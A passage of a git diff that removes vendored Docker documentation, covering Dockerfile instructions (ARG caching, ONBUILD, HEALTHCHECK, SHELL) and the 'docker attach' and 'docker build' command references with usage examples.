instructions.](#environment-replacement) - -Docker has a set of predefined `ARG` variables that you can use without a -corresponding `ARG` instruction in the Dockerfile. - -* `HTTP_PROXY` -* `http_proxy` -* `HTTPS_PROXY` -* `https_proxy` -* `FTP_PROXY` -* `ftp_proxy` -* `NO_PROXY` -* `no_proxy` - -To use these, simply pass them on the command line using the flag: - -``` ---build-arg = -``` - -### Impact on build caching - -`ARG` variables are not persisted into the built image as `ENV` variables are. -However, `ARG` variables do impact the build cache in similar ways. 
If a -Dockerfile defines an `ARG` variable whose value is different from a previous -build, then a "cache miss" occurs upon its first usage, not its definition. In -particular, all `RUN` instructions following an `ARG` instruction use the `ARG` -variable implicitly (as an environment variable), thus can cause a cache miss. - -For example, consider these two Dockerfile: - -``` -1 FROM ubuntu -2 ARG CONT_IMG_VER -3 RUN echo $CONT_IMG_VER -``` - -``` -1 FROM ubuntu -2 ARG CONT_IMG_VER -3 RUN echo hello -``` - -If you specify `--build-arg CONT_IMG_VER=` on the command line, in both -cases, the specification on line 2 does not cause a cache miss; line 3 does -cause a cache miss.`ARG CONT_IMG_VER` causes the RUN line to be identified -as the same as running `CONT_IMG_VER=` echo hello, so if the `` -changes, we get a cache miss. - -Consider another example under the same command line: - -``` -1 FROM ubuntu -2 ARG CONT_IMG_VER -3 ENV CONT_IMG_VER $CONT_IMG_VER -4 RUN echo $CONT_IMG_VER -``` -In this example, the cache miss occurs on line 3. The miss happens because -the variable's value in the `ENV` references the `ARG` variable and that -variable is changed through the command line. In this example, the `ENV` -command causes the image to include the value. - -If an `ENV` instruction overrides an `ARG` instruction of the same name, like -this Dockerfile: - -``` -1 FROM ubuntu -2 ARG CONT_IMG_VER -3 ENV CONT_IMG_VER hello -4 RUN echo $CONT_IMG_VER -``` - -Line 3 does not cause a cache miss because the value of `CONT_IMG_VER` is a -constant (`hello`). As a result, the environment variables and values used on -the `RUN` (line 4) doesn't change between builds. - -## ONBUILD - - ONBUILD [INSTRUCTION] - -The `ONBUILD` instruction adds to the image a *trigger* instruction to -be executed at a later time, when the image is used as the base for -another build. 
The trigger will be executed in the context of the -downstream build, as if it had been inserted immediately after the -`FROM` instruction in the downstream `Dockerfile`. - -Any build instruction can be registered as a trigger. - -This is useful if you are building an image which will be used as a base -to build other images, for example an application build environment or a -daemon which may be customized with user-specific configuration. - -For example, if your image is a reusable Python application builder, it -will require application source code to be added in a particular -directory, and it might require a build script to be called *after* -that. You can't just call `ADD` and `RUN` now, because you don't yet -have access to the application source code, and it will be different for -each application build. You could simply provide application developers -with a boilerplate `Dockerfile` to copy-paste into their application, but -that is inefficient, error-prone and difficult to update because it -mixes with application-specific code. - -The solution is to use `ONBUILD` to register advance instructions to -run later, during the next build stage. - -Here's how it works: - -1. When it encounters an `ONBUILD` instruction, the builder adds a - trigger to the metadata of the image being built. The instruction - does not otherwise affect the current build. -2. At the end of the build, a list of all triggers is stored in the - image manifest, under the key `OnBuild`. They can be inspected with - the `docker inspect` command. -3. Later the image may be used as a base for a new build, using the - `FROM` instruction. As part of processing the `FROM` instruction, - the downstream builder looks for `ONBUILD` triggers, and executes - them in the same order they were registered. If any of the triggers - fail, the `FROM` instruction is aborted which in turn causes the - build to fail. If all triggers succeed, the `FROM` instruction - completes and the build continues as usual. 
-4. Triggers are cleared from the final image after being executed. In - other words they are not inherited by "grand-children" builds. - -For example you might add something like this: - - [...] - ONBUILD ADD . /app/src - ONBUILD RUN /usr/local/bin/python-build --dir /app/src - [...] - -> **Warning**: Chaining `ONBUILD` instructions using `ONBUILD ONBUILD` isn't allowed. - -> **Warning**: The `ONBUILD` instruction may not trigger `FROM` or `MAINTAINER` instructions. - -## STOPSIGNAL - - STOPSIGNAL signal - -The `STOPSIGNAL` instruction sets the system call signal that will be sent to the container to exit. -This signal can be a valid unsigned number that matches a position in the kernel's syscall table, for instance 9, -or a signal name in the format SIGNAME, for instance SIGKILL. - -## HEALTHCHECK - -The `HEALTHCHECK` instruction has two forms: - -* `HEALTHCHECK [OPTIONS] CMD command` (check container health by running a command inside the container) -* `HEALTHCHECK NONE` (disable any healthcheck inherited from the base image) - -The `HEALTHCHECK` instruction tells Docker how to test a container to check that -it is still working. This can detect cases such as a web server that is stuck in -an infinite loop and unable to handle new connections, even though the server -process is still running. - -When a container has a healthcheck specified, it has a _health status_ in -addition to its normal status. This status is initially `starting`. Whenever a -health check passes, it becomes `healthy` (whatever state it was previously in). -After a certain number of consecutive failures, it becomes `unhealthy`. - -The options that can appear before `CMD` are: - -* `--interval=DURATION` (default: `30s`) -* `--timeout=DURATION` (default: `30s`) -* `--retries=N` (default: `3`) - -The health check will first run **interval** seconds after the container is -started, and then again **interval** seconds after each previous check completes. 
- -If a single run of the check takes longer than **timeout** seconds then the check -is considered to have failed. - -It takes **retries** consecutive failures of the health check for the container -to be considered `unhealthy`. - -There can only be one `HEALTHCHECK` instruction in a Dockerfile. If you list -more than one then only the last `HEALTHCHECK` will take effect. - -The command after the `CMD` keyword can be either a shell command (e.g. `HEALTHCHECK -CMD /bin/check-running`) or an _exec_ array (as with other Dockerfile commands; -see e.g. `ENTRYPOINT` for details). - -The command's exit status indicates the health status of the container. -The possible values are: - -- 0: success - the container is healthy and ready for use -- 1: unhealthy - the container is not working correctly -- 2: reserved - do not use this exit code - -For example, to check every five minutes or so that a web-server is able to -serve the site's main page within three seconds: - - HEALTHCHECK --interval=5m --timeout=3s \ - CMD curl -f http://localhost/ || exit 1 - -To help debug failing probes, any output text (UTF-8 encoded) that the command writes -on stdout or stderr will be stored in the health status and can be queried with -`docker inspect`. Such output should be kept short (only the first 4096 bytes -are stored currently). - -When the health status of a container changes, a `health_status` event is -generated with the new status. - -The `HEALTHCHECK` feature was added in Docker 1.12. - - -## SHELL - - SHELL ["executable", "parameters"] - -The `SHELL` instruction allows the default shell used for the *shell* form of -commands to be overridden. The default shell on Linux is `["/bin/sh", "-c"]`, and on -Windows is `["cmd", "/S", "/C"]`. The `SHELL` instruction *must* be written in JSON -form in a Dockerfile. 
- -The `SHELL` instruction is particularly useful on Windows where there are -two commonly used and quite different native shells: `cmd` and `powershell`, as -well as alternate shells available including `sh`. - -The `SHELL` instruction can appear multiple times. Each `SHELL` instruction overrides -all previous `SHELL` instructions, and affects all subsequent instructions. For example: - - FROM microsoft/windowsservercore - - # Executed as cmd /S /C echo default - RUN echo default - - # Executed as cmd /S /C powershell -command Write-Host default - RUN powershell -command Write-Host default - - # Executed as powershell -command Write-Host hello - SHELL ["powershell", "-command"] - RUN Write-Host hello - - # Executed as cmd /S /C echo hello - SHELL ["cmd", "/S"", "/C"] - RUN echo hello - -The following instructions can be affected by the `SHELL` instruction when the -*shell* form of them is used in a Dockerfile: `RUN`, `CMD` and `ENTRYPOINT`. - -The following example is a common pattern found on Windows which can be -streamlined by using the `SHELL` instruction: - - ... - RUN powershell -command Execute-MyCmdlet -param1 "c:\foo.txt" - ... - -The command invoked by docker will be: - - cmd /S /C powershell -command Execute-MyCmdlet -param1 "c:\foo.txt" - -This is inefficient for two reasons. First, there is an un-necessary cmd.exe command -processor (aka shell) being invoked. Second, each `RUN` instruction in the *shell* -form requires an extra `powershell -command` prefixing the command. - -To make this more efficient, one of two mechanisms can be employed. One is to -use the JSON form of the RUN command such as: - - ... - RUN ["powershell", "-command", "Execute-MyCmdlet", "-param1 \"c:\\foo.txt\""] - ... - -While the JSON form is unambiguous and does not use the un-necessary cmd.exe, -it does require more verbosity through double-quoting and escaping. 
The alternate -mechanism is to use the `SHELL` instruction and the *shell* form, -making a more natural syntax for Windows users, especially when combined with -the `escape` parser directive: - - # escape=` - - FROM microsoft/nanoserver - SHELL ["powershell","-command"] - RUN New-Item -ItemType Directory C:\Example - ADD Execute-MyCmdlet.ps1 c:\example\ - RUN c:\example\Execute-MyCmdlet -sample 'hello world' - -Resulting in: - - PS E:\docker\build\shell> docker build -t shell . - Sending build context to Docker daemon 4.096 kB - Step 1/5 : FROM microsoft/nanoserver - ---> 22738ff49c6d - Step 2/5 : SHELL powershell -command - ---> Running in 6fcdb6855ae2 - ---> 6331462d4300 - Removing intermediate container 6fcdb6855ae2 - Step 3/5 : RUN New-Item -ItemType Directory C:\Example - ---> Running in d0eef8386e97 - - - Directory: C:\ - - - Mode LastWriteTime Length Name - ---- ------------- ------ ---- - d----- 10/28/2016 11:26 AM Example - - - ---> 3f2fbf1395d9 - Removing intermediate container d0eef8386e97 - Step 4/5 : ADD Execute-MyCmdlet.ps1 c:\example\ - ---> a955b2621c31 - Removing intermediate container b825593d39fc - Step 5/5 : RUN c:\example\Execute-MyCmdlet 'hello world' - ---> Running in be6d8e63fe75 - hello world - ---> 8e559e9bf424 - Removing intermediate container be6d8e63fe75 - Successfully built 8e559e9bf424 - PS E:\docker\build\shell> - -The `SHELL` instruction could also be used to modify the way in which -a shell operates. For example, using `SHELL cmd /S /C /V:ON|OFF` on Windows, delayed -environment variable expansion semantics could be modified. - -The `SHELL` instruction can also be used on Linux should an alternate shell be -required such as `zsh`, `csh`, `tcsh` and others. - -The `SHELL` feature was added in Docker 1.12. - -## Dockerfile examples - -Below you can see some examples of Dockerfile syntax. If you're interested in -something more realistic, take a look at the list of [Dockerization examples](https://docs.docker.com/engine/examples/). 
- -``` -# Nginx -# -# VERSION 0.0.1 - -FROM ubuntu -LABEL Description="This image is used to start the foobar executable" Vendor="ACME Products" Version="1.0" -RUN apt-get update && apt-get install -y inotify-tools nginx apache2 openssh-server -``` - -``` -# Firefox over VNC -# -# VERSION 0.3 - -FROM ubuntu - -# Install vnc, xvfb in order to create a 'fake' display and firefox -RUN apt-get update && apt-get install -y x11vnc xvfb firefox -RUN mkdir ~/.vnc -# Setup a password -RUN x11vnc -storepasswd 1234 ~/.vnc/passwd -# Autostart firefox (might not be the best way, but it does the trick) -RUN bash -c 'echo "firefox" >> /.bashrc' - -EXPOSE 5900 -CMD ["x11vnc", "-forever", "-usepw", "-create"] -``` - -``` -# Multiple images example -# -# VERSION 0.1 - -FROM ubuntu -RUN echo foo > bar -# Will output something like ===> 907ad6c2736f - -FROM ubuntu -RUN echo moo > oink -# Will output something like ===> 695d7793cbe4 - -# You᾿ll now have two images, 907ad6c2736f with /bar, and 695d7793cbe4 with -# /oink. -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/attach.md b/vendor/github.com/docker/docker/docs/reference/commandline/attach.md deleted file mode 100644 index 307068a339..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/attach.md +++ /dev/null @@ -1,131 +0,0 @@ ---- -title: "attach" -description: "The attach command description and usage" -keywords: "attach, running, container" ---- - - - -# attach - -```markdown -Usage: docker attach [OPTIONS] CONTAINER - -Attach to a running container - -Options: - --detach-keys string Override the key sequence for detaching a container - --help Print usage - --no-stdin Do not attach STDIN - --sig-proxy Proxy all received signals to the process (default true) -``` - -Use `docker attach` to attach to a running container using the container's ID -or name, either to view its ongoing output or to control it interactively. 
-You can attach to the same contained process multiple times simultaneously, -screen sharing style, or quickly view the progress of your detached process. - -To stop a container, use `CTRL-c`. This key sequence sends `SIGKILL` to the -container. If `--sig-proxy` is true (the default),`CTRL-c` sends a `SIGINT` to -the container. You can detach from a container and leave it running using the - `CTRL-p CTRL-q` key sequence. - -> **Note:** -> A process running as PID 1 inside a container is treated specially by -> Linux: it ignores any signal with the default action. So, the process -> will not terminate on `SIGINT` or `SIGTERM` unless it is coded to do -> so. - -It is forbidden to redirect the standard input of a `docker attach` command -while attaching to a tty-enabled container (i.e.: launched with `-t`). - -While a client is connected to container's stdio using `docker attach`, Docker -uses a ~1MB memory buffer to maximize the throughput of the application. If -this buffer is filled, the speed of the API connection will start to have an -effect on the process output writing speed. This is similar to other -applications like SSH. Because of this, it is not recommended to run -performance critical applications that generate a lot of output in the -foreground over a slow client connection. Instead, users should use the -`docker logs` command to get access to the logs. - - -## Override the detach sequence - -If you want, you can configure an override the Docker key sequence for detach. -This is useful if the Docker default sequence conflicts with key sequence you -use for other applications. There are two ways to define your own detach key -sequence, as a per-container override or as a configuration property on your -entire configuration. - -To override the sequence for an individual container, use the -`--detach-keys=""` flag with the `docker attach` command. 
The format of -the `` is either a letter [a-Z], or the `ctrl-` combined with any of -the following: - -* `a-z` (a single lowercase alpha character ) -* `@` (at sign) -* `[` (left bracket) -* `\\` (two backward slashes) -* `_` (underscore) -* `^` (caret) - -These `a`, `ctrl-a`, `X`, or `ctrl-\\` values are all examples of valid key -sequences. To configure a different configuration default key sequence for all -containers, see [**Configuration file** section](cli.md#configuration-files). - -#### Examples - - $ docker run -d --name topdemo ubuntu /usr/bin/top -b - $ docker attach topdemo - top - 02:05:52 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 - Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie - Cpu(s): 0.1%us, 0.2%sy, 0.0%ni, 99.7%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st - Mem: 373572k total, 355560k used, 18012k free, 27872k buffers - Swap: 786428k total, 0k used, 786428k free, 221740k cached - - PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND - 1 root 20 0 17200 1116 912 R 0 0.3 0:00.03 top - - top - 02:05:55 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 - Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie - Cpu(s): 0.0%us, 0.2%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st - Mem: 373572k total, 355244k used, 18328k free, 27872k buffers - Swap: 786428k total, 0k used, 786428k free, 221776k cached - - PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND - 1 root 20 0 17208 1144 932 R 0 0.3 0:00.03 top - - - top - 02:05:58 up 3:06, 0 users, load average: 0.01, 0.02, 0.05 - Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie - Cpu(s): 0.2%us, 0.3%sy, 0.0%ni, 99.5%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st - Mem: 373572k total, 355780k used, 17792k free, 27880k buffers - Swap: 786428k total, 0k used, 786428k free, 221776k cached - - PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND - 1 root 20 0 17208 1144 932 R 0 0.3 0:00.03 top - ^C$ - $ echo $? 
- 0 - $ docker ps -a | grep topdemo - 7998ac8581f9 ubuntu:14.04 "/usr/bin/top -b" 38 seconds ago Exited (0) 21 seconds ago topdemo - -And in this second example, you can see the exit code returned by the `bash` -process is returned by the `docker attach` command to its caller too: - - $ docker run --name test -d -it debian - 275c44472aebd77c926d4527885bb09f2f6db21d878c75f0a1c212c03d3bcfab - $ docker attach test - root@f38c87f2a42d:/# exit 13 - exit - $ echo $? - 13 - $ docker ps -a | grep test - 275c44472aeb debian:7 "/bin/bash" 26 seconds ago Exited (13) 17 seconds ago test diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/build.md b/vendor/github.com/docker/docker/docs/reference/commandline/build.md deleted file mode 100644 index 42c3ecf65f..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/build.md +++ /dev/null @@ -1,451 +0,0 @@ ---- -title: "build" -description: "The build command description and usage" -keywords: "build, docker, image" ---- - - - -# build - -```markdown -Usage: docker build [OPTIONS] PATH | URL | - - -Build an image from a Dockerfile - -Options: - --build-arg value Set build-time variables (default []) - --cache-from value Images to consider as cache sources (default []) - --cgroup-parent string Optional parent cgroup for the container - --compress Compress the build context using gzip - --cpu-period int Limit the CPU CFS (Completely Fair Scheduler) period - --cpu-quota int Limit the CPU CFS (Completely Fair Scheduler) quota - -c, --cpu-shares int CPU shares (relative weight) - --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) - --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) - --disable-content-trust Skip image verification (default true) - -f, --file string Name of the Dockerfile (Default is 'PATH/Dockerfile') - --force-rm Always remove intermediate containers - --help Print usage - --isolation string Container isolation technology - --label value Set metadata 
for an image (default []) - -m, --memory string Memory limit - --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap - --network string Set the networking mode for the RUN instructions during build - 'bridge': use default Docker bridge - 'none': no networking - 'container:': reuse another container's network stack - 'host': use the Docker host network stack - '|': connect to a user-defined network - --no-cache Do not use cache when building the image - --pull Always attempt to pull a newer version of the image - -q, --quiet Suppress the build output and print image ID on success - --rm Remove intermediate containers after a successful build (default true) - --security-opt value Security Options (default []) - --shm-size string Size of /dev/shm, default value is 64MB. - The format is ``. `number` must be greater than `0`. - Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), - or `g` (gigabytes). If you omit the unit, the system uses bytes. - --squash Squash newly built layers into a single new layer (**Experimental Only**) - -t, --tag value Name and optionally a tag in the 'name:tag' format (default []) - --ulimit value Ulimit options (default []) -``` - -Builds Docker images from a Dockerfile and a "context". A build's context is -the files located in the specified `PATH` or `URL`. The build process can refer -to any of the files in the context. For example, your build can use an -[*ADD*](../builder.md#add) instruction to reference a file in the -context. - -The `URL` parameter can refer to three kinds of resources: Git repositories, -pre-packaged tarball contexts and plain text files. - -### Git repositories - -When the `URL` parameter points to the location of a Git repository, the -repository acts as the build context. The system recursively clones the -repository and its submodules using a `git clone --depth 1 --recursive` -command. This command runs in a temporary directory on your local host. 
After -the command succeeds, the directory is sent to the Docker daemon as the -context. Local clones give you the ability to access private repositories using -local user credentials, VPN's, and so forth. - -Git URLs accept context configuration in their fragment section, separated by a -colon `:`. The first part represents the reference that Git will check out, -this can be either a branch, a tag, or a commit SHA. The second part represents -a subdirectory inside the repository that will be used as a build context. - -For example, run this command to use a directory called `docker` in the branch -`container`: - -```bash -$ docker build https://github.com/docker/rootfs.git#container:docker -``` - -The following table represents all the valid suffixes with their build -contexts: - -Build Syntax Suffix | Commit Used | Build Context Used ---------------------------------|-----------------------|------------------- -`myrepo.git` | `refs/heads/master` | `/` -`myrepo.git#mytag` | `refs/tags/mytag` | `/` -`myrepo.git#mybranch` | `refs/heads/mybranch` | `/` -`myrepo.git#abcdef` | `sha1 = abcdef` | `/` -`myrepo.git#:myfolder` | `refs/heads/master` | `/myfolder` -`myrepo.git#master:myfolder` | `refs/heads/master` | `/myfolder` -`myrepo.git#mytag:myfolder` | `refs/tags/mytag` | `/myfolder` -`myrepo.git#mybranch:myfolder` | `refs/heads/mybranch` | `/myfolder` -`myrepo.git#abcdef:myfolder` | `sha1 = abcdef` | `/myfolder` - - -### Tarball contexts - -If you pass an URL to a remote tarball, the URL itself is sent to the daemon: - -Instead of specifying a context, you can pass a single Dockerfile in the `URL` -or pipe the file in via `STDIN`. To pipe a Dockerfile from `STDIN`: - -```bash -$ docker build http://server/context.tar.gz -``` - -The download operation will be performed on the host the Docker daemon is -running on, which is not necessarily the same host from which the build command -is being issued. 
The Docker daemon will fetch `context.tar.gz` and use it as the -build context. Tarball contexts must be tar archives conforming to the standard -`tar` UNIX format and can be compressed with any one of the 'xz', 'bzip2', -'gzip' or 'identity' (no compression) formats. - -### Text files - -Instead of specifying a context, you can pass a single `Dockerfile` in the -`URL` or pipe the file in via `STDIN`. To pipe a `Dockerfile` from `STDIN`: - -```bash -$ docker build - < Dockerfile -``` - -With Powershell on Windows, you can run: - -```powershell -Get-Content Dockerfile | docker build - -``` - -If you use `STDIN` or specify a `URL` pointing to a plain text file, the system -places the contents into a file called `Dockerfile`, and any `-f`, `--file` -option is ignored. In this scenario, there is no context. - -By default the `docker build` command will look for a `Dockerfile` at the root -of the build context. The `-f`, `--file`, option lets you specify the path to -an alternative file to use instead. This is useful in cases where the same set -of files are used for multiple builds. The path must be to a file within the -build context. If a relative path is specified then it is interpreted as -relative to the root of the context. - -In most cases, it's best to put each Dockerfile in an empty directory. Then, -add to that directory only the files needed for building the Dockerfile. To -increase the build's performance, you can exclude files and directories by -adding a `.dockerignore` file to that directory as well. For information on -creating one, see the [.dockerignore file](../builder.md#dockerignore-file). - -If the Docker client loses connection to the daemon, the build is canceled. -This happens if you interrupt the Docker client with `CTRL-c` or if the Docker -client is killed for any reason. If the build initiated a pull which is still -running at the time the build is cancelled, the pull is cancelled as well. 
- -## Return code - -On a successful build, a return code of success `0` will be returned. When the -build fails, a non-zero failure code will be returned. - -There should be informational output of the reason for failure output to -`STDERR`: - -```bash -$ docker build -t fail . - -Sending build context to Docker daemon 2.048 kB -Sending build context to Docker daemon -Step 1/3 : FROM busybox - ---> 4986bf8c1536 -Step 2/3 : RUN exit 13 - ---> Running in e26670ec7a0a -INFO[0000] The command [/bin/sh -c exit 13] returned a non-zero code: 13 -$ echo $? -1 -``` - -See also: - -[*Dockerfile Reference*](../builder.md). - -## Examples - -### Build with PATH - -```bash -$ docker build . - -Uploading context 10240 bytes -Step 1/3 : FROM busybox -Pulling repository busybox - ---> e9aa60c60128MB/2.284 MB (100%) endpoint: https://cdn-registry-1.docker.io/v1/ -Step 2/3 : RUN ls -lh / - ---> Running in 9c9e81692ae9 -total 24 -drwxr-xr-x 2 root root 4.0K Mar 12 2013 bin -drwxr-xr-x 5 root root 4.0K Oct 19 00:19 dev -drwxr-xr-x 2 root root 4.0K Oct 19 00:19 etc -drwxr-xr-x 2 root root 4.0K Nov 15 23:34 lib -lrwxrwxrwx 1 root root 3 Mar 12 2013 lib64 -> lib -dr-xr-xr-x 116 root root 0 Nov 15 23:34 proc -lrwxrwxrwx 1 root root 3 Mar 12 2013 sbin -> bin -dr-xr-xr-x 13 root root 0 Nov 15 23:34 sys -drwxr-xr-x 2 root root 4.0K Mar 12 2013 tmp -drwxr-xr-x 2 root root 4.0K Nov 15 23:34 usr - ---> b35f4035db3f -Step 3/3 : CMD echo Hello world - ---> Running in 02071fceb21b - ---> f52f38b7823e -Successfully built f52f38b7823e -Removing intermediate container 9c9e81692ae9 -Removing intermediate container 02071fceb21b -``` - -This example specifies that the `PATH` is `.`, and so all the files in the -local directory get `tar`d and sent to the Docker daemon. The `PATH` specifies -where to find the files for the "context" of the build on the Docker daemon. 
-Remember that the daemon could be running on a remote machine and that no -parsing of the Dockerfile happens at the client side (where you're running -`docker build`). That means that *all* the files at `PATH` get sent, not just -the ones listed to [*ADD*](../builder.md#add) in the Dockerfile. - -The transfer of context from the local machine to the Docker daemon is what the -`docker` client means when you see the "Sending build context" message. - -If you wish to keep the intermediate containers after the build is complete, -you must use `--rm=false`. This does not affect the build cache. - -### Build with URL - -```bash -$ docker build github.com/creack/docker-firefox -``` - -This will clone the GitHub repository and use the cloned repository as context. -The Dockerfile at the root of the repository is used as Dockerfile. You can -specify an arbitrary Git repository by using the `git://` or `git@` scheme. - -```bash -$ docker build -f ctx/Dockerfile http://server/ctx.tar.gz - -Downloading context: http://server/ctx.tar.gz [===================>] 240 B/240 B -Step 1/3 : FROM busybox - ---> 8c2e06607696 -Step 2/3 : ADD ctx/container.cfg / - ---> e7829950cee3 -Removing intermediate container b35224abf821 -Step 3/3 : CMD /bin/ls - ---> Running in fbc63d321d73 - ---> 3286931702ad -Removing intermediate container fbc63d321d73 -Successfully built 377c409b35e4 -``` - -This sends the URL `http://server/ctx.tar.gz` to the Docker daemon, which -downloads and extracts the referenced tarball. The `-f ctx/Dockerfile` -parameter specifies a path inside `ctx.tar.gz` to the `Dockerfile` that is used -to build the image. Any `ADD` commands in that `Dockerfile` that refer to local -paths must be relative to the root of the contents inside `ctx.tar.gz`. In the -example above, the tarball contains a directory `ctx/`, so the `ADD -ctx/container.cfg /` operation works as expected. 
- -### Build with - - -```bash -$ docker build - < Dockerfile -``` - -This will read a Dockerfile from `STDIN` without context. Due to the lack of a -context, no contents of any local directory will be sent to the Docker daemon. -Since there is no context, a Dockerfile `ADD` only works if it refers to a -remote URL. - -```bash -$ docker build - < context.tar.gz -``` - -This will build an image for a compressed context read from `STDIN`. Supported -formats are: bzip2, gzip and xz. - -### Usage of .dockerignore - -```bash -$ docker build . - -Uploading context 18.829 MB -Uploading context -Step 1/2 : FROM busybox - ---> 769b9341d937 -Step 2/2 : CMD echo Hello world - ---> Using cache - ---> 99cc1ad10469 -Successfully built 99cc1ad10469 -$ echo ".git" > .dockerignore -$ docker build . -Uploading context 6.76 MB -Uploading context -Step 1/2 : FROM busybox - ---> 769b9341d937 -Step 2/2 : CMD echo Hello world - ---> Using cache - ---> 99cc1ad10469 -Successfully built 99cc1ad10469 -``` - -This example shows the use of the `.dockerignore` file to exclude the `.git` -directory from the context. Its effect can be seen in the changed size of the -uploaded context. The builder reference contains detailed information on -[creating a .dockerignore file](../builder.md#dockerignore-file) - -### Tag image (-t) - -```bash -$ docker build -t vieux/apache:2.0 . -``` - -This will build like the previous example, but it will then tag the resulting -image. The repository name will be `vieux/apache` and the tag will be `2.0`. -[Read more about valid tags](tag.md). - -You can apply multiple tags to an image. For example, you can apply the `latest` -tag to a newly built image and add another tag that references a specific -version. -For example, to tag an image both as `whenry/fedora-jboss:latest` and -`whenry/fedora-jboss:v2.1`, use the following: - -```bash -$ docker build -t whenry/fedora-jboss:latest -t whenry/fedora-jboss:v2.1 . 
-``` -### Specify Dockerfile (-f) - -```bash -$ docker build -f Dockerfile.debug . -``` - -This will use a file called `Dockerfile.debug` for the build instructions -instead of `Dockerfile`. - -```bash -$ docker build -f dockerfiles/Dockerfile.debug -t myapp_debug . -$ docker build -f dockerfiles/Dockerfile.prod -t myapp_prod . -``` - -The above commands will build the current build context (as specified by the -`.`) twice, once using a debug version of a `Dockerfile` and once using a -production version. - -```bash -$ cd /home/me/myapp/some/dir/really/deep -$ docker build -f /home/me/myapp/dockerfiles/debug /home/me/myapp -$ docker build -f ../../../../dockerfiles/debug /home/me/myapp -``` - -These two `docker build` commands do the exact same thing. They both use the -contents of the `debug` file instead of looking for a `Dockerfile` and will use -`/home/me/myapp` as the root of the build context. Note that `debug` is in the -directory structure of the build context, regardless of how you refer to it on -the command line. - -> **Note:** -> `docker build` will return a `no such file or directory` error if the -> file or directory does not exist in the uploaded context. This may -> happen if there is no context, or if you specify a file that is -> elsewhere on the Host system. The context is limited to the current -> directory (and its children) for security reasons, and to ensure -> repeatable builds on remote Docker hosts. This is also the reason why -> `ADD ../file` will not work. - -### Optional parent cgroup (--cgroup-parent) - -When `docker build` is run with the `--cgroup-parent` option the containers -used in the build will be run with the [corresponding `docker run` -flag](../run.md#specifying-custom-cgroups). - -### Set ulimits in container (--ulimit) - -Using the `--ulimit` option with `docker build` will cause each build step's -container to be started using those [`--ulimit` -flag values](./run.md#set-ulimits-in-container-ulimit). 
- -### Set build-time variables (--build-arg) - -You can use `ENV` instructions in a Dockerfile to define variable -values. These values persist in the built image. However, often -persistence is not what you want. Users want to specify variables differently -depending on which host they build an image on. - -A good example is `http_proxy` or source versions for pulling intermediate -files. The `ARG` instruction lets Dockerfile authors define values that users -can set at build-time using the `--build-arg` flag: - -```bash -$ docker build --build-arg HTTP_PROXY=http://10.20.30.2:1234 . -``` - -This flag allows you to pass the build-time variables that are -accessed like regular environment variables in the `RUN` instruction of the -Dockerfile. Also, these values don't persist in the intermediate or final images -like `ENV` values do. - -Using this flag will not alter the output you see when the `ARG` lines from the -Dockerfile are echoed during the build process. - -For detailed information on using `ARG` and `ENV` instructions, see the -[Dockerfile reference](../builder.md). - -### Optional security options (--security-opt) - -This flag is only supported on a daemon running on Windows, and only supports -the `credentialspec` option. The `credentialspec` must be in the format -`file://spec.txt` or `registry://keyname`. - -### Specify isolation technology for container (--isolation) - -This option is useful in situations where you are running Docker containers on -Windows. The `--isolation=` option sets a container's isolation -technology. On Linux, the only supported is the `default` option which uses -Linux namespaces. On Microsoft Windows, you can specify these values: - - -| Value | Description | -|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `default` | Use the value specified by the Docker daemon's `--exec-opt` . 
If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. | -| `process` | Namespace isolation only. | -| `hyperv` | Hyper-V hypervisor partition-based isolation. | - -Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. - - -### Squash an image's layers (--squash) **Experimental Only** - -Once the image is built, squash the new layers into a new image with a single -new layer. Squashing does not destroy any existing image, rather it creates a new -image with the content of the squshed layers. This effectively makes it look -like all `Dockerfile` commands were created with a single layer. The build -cache is preserved with this method. - -**Note**: using this option means the new image will not be able to take -advantage of layer sharing with other images and may use significantly more -space. - -**Note**: using this option you may see significantly more space used due to -storing two copies of the image, one for the build cache with all the cache -layers in tact, and one for the squashed version. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/cli.md b/vendor/github.com/docker/docker/docs/reference/commandline/cli.md deleted file mode 100644 index e56fb9f847..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/cli.md +++ /dev/null @@ -1,249 +0,0 @@ ---- -title: "Use the Docker command line" -description: "Docker's CLI command description and usage" -keywords: "Docker, Docker documentation, CLI, command line" ---- - - - -# Use the Docker command line - -To list available commands, either run `docker` with no parameters -or execute `docker help`: - -```bash -$ docker -Usage: docker [OPTIONS] COMMAND [ARG...] - docker [ --help | -v | --version ] - -A self-sufficient runtime for containers. 
